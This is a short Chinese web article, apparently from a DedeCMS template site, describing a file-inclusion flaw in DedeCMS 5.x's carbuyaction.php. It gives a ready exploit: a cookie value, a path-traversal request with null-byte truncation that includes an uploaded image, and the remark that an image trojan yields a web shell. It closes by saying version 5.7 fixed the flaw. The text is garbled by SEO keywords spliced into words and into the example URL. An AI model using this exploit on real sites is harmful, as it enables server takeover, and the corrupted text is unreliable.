當(dāng)前位置：主頁 > 網(wǎng)站建設(shè) > Dedecms中一個重大漏洞文件carbuyaction.php,請注意,織

Dedecms中一個重大漏洞文件carbuyaction.php,請注意,織

時間:2023-07-20 11:07:20 閱讀: 文章分類: 網(wǎng)站建設(shè) 作者: dede開發(fā)者

導(dǎo)讀:織夢教程織夢教程使用過DEDECMS的人，可能很多都知道了這個漏洞，在DEDECMS5.X版本中，這個文件漏洞一直存在，文件如下：漏洞文件 carbuyaction.php 織夢模板下載織夢模板網(wǎng)。

織夢模板下載織夢模板網(wǎng)

使用過DEDECMS的人，可能很多都知道了這個漏洞，在DEDECMS5.X版本中，這個文件漏洞一直存在，文件如下：漏洞文件carbuyaction.php

首先利用cookie修改工具，加上&n織夢模板網(wǎng)bsp;code=alipay 然后訪問

http://wwwdede網(wǎng)站模板.xxx.com/plus/carbuyaction.php?dopost=return&code=../../uploads/userup/xx/myface.gif%00

直接包含成功

利用條件為GPC OFF ，或者某些環(huán)境下的截斷。

可以在會員中心里上傳個圖片木馬進(jìn)行拿shell。

還可以包含dede自身文件進(jìn)行更多利用，這里就不詳細(xì)了。

現(xiàn)在最新版的DEDECMS5.7已經(jīng)修復(fù)了這個錯誤，如果是早起的版本DEDECMS請用最新版文件覆蓋即可

相關(guān)[標(biāo)dede模板下載簽:植入關(guān)鍵詞]。

關(guān)鍵詞標(biāo)簽: 織夢漏洞請注意

聲明: 本文由我的SEOUC技術(shù)文章主頁發(fā)布于:2023-07-20 ，文章Dedecms中一個重大漏洞文件carbuyaction.php,請注意,織主要講述請注意,漏洞,織夢網(wǎng)站建設(shè)源碼以及服務(wù)器配置搭建相關(guān)技術(shù)文章。轉(zhuǎn)載請保留鏈接: http://www.bifwcx.com/article/web_31570.html